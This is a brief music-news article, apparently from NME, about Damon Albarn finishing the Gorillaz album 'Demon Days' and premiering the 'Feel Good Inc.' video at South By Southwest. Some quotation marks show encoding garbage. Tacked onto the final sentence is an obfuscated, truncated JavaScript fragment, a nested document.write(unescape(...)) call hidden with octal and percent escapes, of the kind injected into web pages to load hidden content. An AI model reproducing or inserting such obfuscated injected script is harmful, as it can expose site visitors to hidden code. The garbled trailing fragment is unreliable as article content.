Gorillaz's Damon Albarn is relieved to have finished work on the band's latest album.
The Blur singer premiered the animated video for the group's forthcoming single 'Feel Good Inc.' in a bar at the South By Southwest festival in Austin, Texas on Thursday (March 17).
Talking about Gorillaz's upcoming album 'Demon Days', Albarn told Billboard.com: “It takes a long time. We recorded most of it last year. And working on the video is intensive. It takes more than three months to get it done once you start."
Albarn has also revealed that the band's tour will be “completely different†than the last, which saw the project's musicians play behind a screen featuring their animated counterparts - 2-D, Noodle, Murdoc and Russell.
Of his future plans, Albarn said: “Then I'm going abroad to make more recordings, then we'll get back to working (on a new Blur album) after that.â€
As previously reported on NME.COM, ‘Demon Days' is released on May 23, and will be preceded by the single ‘Feel Good Inc' on May 9.document.write(unescape('\04564%6F%63um\145%6Et.%77r%69t\145\04528u%6E\04565s\04563ap\04565\04528\047\045253C%21%5C0\0645\062D%252D\047)\051;
